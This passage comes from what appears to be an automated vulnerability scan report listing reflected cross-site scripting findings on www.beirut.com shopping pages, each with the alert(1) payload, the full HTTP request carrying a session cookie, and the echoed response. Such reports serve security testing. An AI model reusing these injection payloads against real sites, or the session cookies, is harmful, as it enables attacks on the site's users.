Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 662a8'-alert(1)-'0c55c544abd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings662a8'-alert(1)-'0c55c544abd/4120758082/China-Glassware/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:33:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Home-Furnishings662a8'-alert(1)-'0c55c544abd/4120758082/China-Glassware/7';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.999. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dd353<script>alert(1)</script>6e43e896c14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingsdd353<script>alert(1)</script>6e43e896c14/4120758082/China-Glassware/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:34:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingsdd353<script>alert(1)</script>6e43e896c14 <a href="#" id="backlink">
...[SNIP]...

4.1000. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6c80'-alert(1)-'c950948c136 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082d6c80'-alert(1)-'c950948c136/China-Glassware/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:37:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082d6c80'-alert(1)-'c950948c136/China-Glassware/7';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1001. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33479'-alert(1)-'7c28f8dee98 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/China-Glassware33479'-alert(1)-'7c28f8dee98/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:41:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082/China-Glassware33479'-alert(1)-'7c28f8dee98/7';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1002. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c8f8'-alert(1)-'6a945ffae2e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/China-Glassware/79c8f8'-alert(1)-'6a945ffae2e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:44:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082/China-Glassware/79c8f8'-alert(1)-'6a945ffae2e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1003. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6f09'-alert(1)-'d4afe0e3fcb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppingf6f09'-alert(1)-'d4afe0e3fcb/Home-Furnishings/4120758082/Furniture-Rentals/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:31:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shoppingf6f09'-alert(1)-'d4afe0e3fcb/Home-Furnishings/4120758082/Furniture-Rentals/9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1004. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c433"><a>8c38f7750ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping3c433"><a>8c38f7750ca/Home-Furnishings/4120758082/Furniture-Rentals/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:24:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping3c433"><a>8c38f7750ca">
...[SNIP]...

4.1005. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f304e'-alert(1)-'8a657e66075 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishingsf304e'-alert(1)-'8a657e66075/4120758082/Furniture-Rentals/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:37:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishingsf304e'-alert(1)-'8a657e66075/4120758082/Furniture-Rentals/9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1006. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 741f6<script>alert(1)</script>27eeededa1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishings741f6<script>alert(1)</script>27eeededa1b/4120758082/Furniture-Rentals/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:37:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishings741f6<script>alert(1)</script>27eeededa1b <a href="#" id="backlink">
...[SNIP]...

4.1007. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 398bc'-alert(1)-'a711843de8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082398bc'-alert(1)-'a711843de8f/Furniture-Rentals/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:41:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082398bc'-alert(1)-'a711843de8f/Furniture-Rentals/9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1008. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1118'-alert(1)-'292a7a8d67f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Furniture-Rentalsf1118'-alert(1)-'292a7a8d67f/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:47:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/4120758082/Furniture-Rentalsf1118'-alert(1)-'292a7a8d67f/9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1009. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abcbe'-alert(1)-'b38da2feaa5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9abcbe'-alert(1)-'b38da2feaa5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:51:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9abcbe'-alert(1)-'b38da2feaa5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1010. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36118'-alert(1)-'3205e213c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping36118'-alert(1)-'3205e213c6/Home-Furnishings/4120758082/Furniture/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:19:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
